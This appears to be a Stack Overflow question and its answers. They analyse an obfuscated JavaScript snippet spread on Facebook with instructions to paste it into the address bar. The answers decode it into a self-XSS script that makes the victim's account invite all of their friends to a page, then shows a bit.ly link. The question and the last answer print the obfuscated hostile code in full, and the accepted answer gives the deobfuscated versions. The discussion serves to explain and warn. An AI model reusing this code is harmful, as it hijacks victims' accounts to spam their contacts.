# Javascript in the address bar - is this malicious? 

Tags: javascript, security

I got a message on Facebook telling me to copy and paste this into my address bar. I thought I'd post it here and see what everyone thinks about it. What does it do? How does it work?

Here's the source code:

```
// (DO NOT DO THIS!)
Javascript:var a=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x31\x32\x36\x38\x32\x36\x39\x35\x34\x31\x38\x35\x32\x33\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
void (document[a[2]](a[1])[a[0]]=a[3]);var ss=document[a[2]](a[4]);
var c=document[a[6]](a[5]);
c[a[8]](a[7],true,true);
void (ss[a[9]](c));
void (setTimeout(function (){fs[a[10]]();} ,4000));
void (setTimeout(function (){SocialGraphManager[a[13]](a[11],a[12]);} ,5000));
void (setTimeout(function (){
document[a[2]](a[1])[a[0]]="\x3C\x61\x20\x68\x72\x65\x66\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x62\x54\x6C\x30\x76\x6A\x27\x3E\x43\x6F\x6D\x70\x6C\x65\x74\x65\x64\x21\x20\x43\x6C\x69\x63\x6B\x20\x68\x65\x72\x65\x3C\x2F\x61\x3E";
} ,5400));
```

Comment: possible duplicate of [Javascript compiled or not? Check inside....](http://stackoverflow.com/questions/2613986/javascript-compiled-or-not-check-inside)

Comment: @meager - how is it a duplicate? Even if the code snippet is the same (which it is not exactly), the question around the code is totally different.

Answer (score 21, accepted):

Here is the formatted source:

```
var a = ["innerHTML", 
         "app4949752878_app4949752878_dd", 
         "getElementById", 
         "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>",
         "suggest", 
         "MouseEvents", 
         "createEvent", 
         "click", 
         "initEvent", 
         "dispatchEvent", 
         "select_all", 
         "sgm_invite_form", 
         "/ajax/social_graph/invite_dialog.php", 
         "submitDialog"];

void (document[a[2]](a[1])[a[0]] = a[3]);
var ss = document[a[2]](a[4]);
var c = document[a[6]](a[5]);
c[a[8]](a[7], true, true);
void ss[a[9]](c);
void setTimeout(function () {fs[a[10]]();}, 4000);
void setTimeout(function () {SocialGraphManager[a[13]](a[11], a[12]);}, 5000);
void setTimeout(function () {document[a[2]](a[1])[a[0]] = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";}, 5400);
```

The `a` array holds all strings used by the code.
Here it is with the strings put back in place:

```
void (document.getElementById('app4949752878_app4949752878_dd').innerHTML =  "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>");
var ss = document.getElementById("suggest");
var c = document.createEvent("MouseEvents");
c.initEvent("click", true, true);
void ss.dispatchEvent(c);
void setTimeout(function () {fs.select_all();}, 4000);
void setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
void setTimeout(function () {
    document.getElementById('app4949752878_app4949752878_dd').innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";
}, 5400);
```

Finally, here it is with decent names and structure:

```
var messageElement = document.getElementById('app4949752878_app4949752878_dd');

messageElement.innerHTML = 
    "<a id=\"suggest\" href=\"#\" ajaxify=\"/ajax/social_graph/invite_dialog.php?class=FanManager&amp;node_id=112682695418523\" class=\" profile_action actionspro_a\" rel=\"dialog-post\">Suggest to Friends</a>";

var suggestLink = document.getElementById("suggest");
var mouseEvent = document.createEvent("MouseEvents");
mouseEvent.initEvent("click", true, true);
suggestLink.dispatchEvent(mouseEvent);


setTimeout(function () { fs.select_all(); }, 4000);
setTimeout(function () {
    SocialGraphManager.submitDialog("sgm_invite_form", "/ajax/social_graph/invite_dialog.php");
}, 5000);
setTimeout(function () {
    messageElement.innerHTML = "<a href='http://bit.ly/bTl0vj'>Completed! Click here</a>";
}, 5400);
```

Comment: Please wait while I translate it.

Comment: It looks like a cheap way of selecting all of your friends and inviting them to use the app.

Comment: Danten's got it, although I guessed that as soon as I read it was from facebook

Comment: so whats all the X##/X##/X## stuff thats in a in the original source code?

Comment: SLaks what tools did you use to translate this?

Comment: @yar: Firebug.  `alert(function() { any source });`

Comment: The interesting thing is how many people actually fell for it - 13K! And it includes people from UK, US and Australia. See the report over here - http://bit.ly/info/bTl0vj

Comment: @SLaks: The Firebug trick is nice. Didn't know that alerting a function actually parses it and prints it in a pretty way. Thanks!

Comment: @Atmocreations: That's done by `Function.prototype.toString`.

Answer (score 3):

I always find this sort of thing interesting because it shows various ways people use to try and get around security or entice others to do something stupid.

My "Golden rule" is that things like this are always something very dodgy and best ignored. Nothing legit requires this sort of hacking, at the very least it probably contravenes some site policy. At the very worst you get hacked and your computer or online identity used and abused or your bank accounts drained.

Answer (score 0):

Very interesting. How did you go about decoding it though?

I got something like this just now, but it didn't look like the sametype of content. Part of the code (the latter half) is below. I didn't know if I should paste the entire code. Newbie here.

```
 (new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();
```